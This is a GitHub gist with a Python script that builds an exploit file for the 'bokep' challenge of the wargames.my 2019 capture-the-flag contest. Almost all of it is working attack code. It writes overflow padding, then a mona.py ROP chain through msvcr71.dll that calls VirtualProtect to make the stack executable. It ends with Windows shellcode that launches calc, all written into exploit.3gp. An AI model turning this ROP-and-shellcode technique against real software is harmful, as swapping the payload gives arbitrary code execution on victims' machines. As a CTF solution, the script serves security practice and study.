Created
December 21, 2019 03:52
-
-
Save shahrilnet/6b2d89a85040ec1a482a793acaa3464a to your computer and use it in GitHub Desktop.
Build exploit for wargames.my 2019's bokep (from nafiez)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| buf = b'A' * 132 | |
| # | |
| # virtualProtect() for rwx (msvcr71.dll – v7.10.3052.4) | |
| # url: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_v71030524 | |
| # | |
| rop_gadgets = [ | |
| 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN | |
| 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) | |
| 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] | |
| 0x7c3415a2, # JMP [EAX] [msvcr71.dll] | |
| 0xffffffff, # | |
| 0x7c376402, # skip 4 bytes [msvcr71.dll] | |
| 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] | |
| 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] | |
| 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] | |
| 0x7c344f87, # POP EDX # RETN [msvcr71.dll] | |
| 0xffffffc0, # Value to negate, will become 0x00000040 | |
| 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] | |
| 0x7c34d201, # POP ECX # RETN [msvcr71.dll] | |
| 0x7c38b001, # &Writable location [msvcr71.dll] | |
| 0x7c347f97, # POP EAX # RETN [msvcr71.dll] | |
| 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] | |
| 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] | |
| 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] | |
| # rop chain generated with mona.py | |
| ] | |
| ''' | |
| BOOL VirtualProtectEx( | |
| HANDLE hProcess, = 0xffffffff | |
| LPVOID lpAddress, = 0x0018FF88 (buffer address) | |
| SIZE_T dwSize, = 513 (size of buffer) | |
| DWORD flNewProtect, = 0x00000040 (PAGE_EXECUTE_READWRITE) | |
| PDWORD lpflOldProtect = 0x7C38B001 | |
| ); | |
| stack | |
| ------- | |
| start of ROP chain addr (0x0018FF44) | |
| after ROP, jmp to 0x0018FF8C | |
| ''' | |
| for e in rop_gadgets: | |
| buf += struct.pack("<I", e) | |
| # | |
| # windows calc shellcode | |
| # url: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html | |
| # | |
| buf += b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" | |
| with open("exploit.3gp", "wb") as fo: | |
| fo.write(buf) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment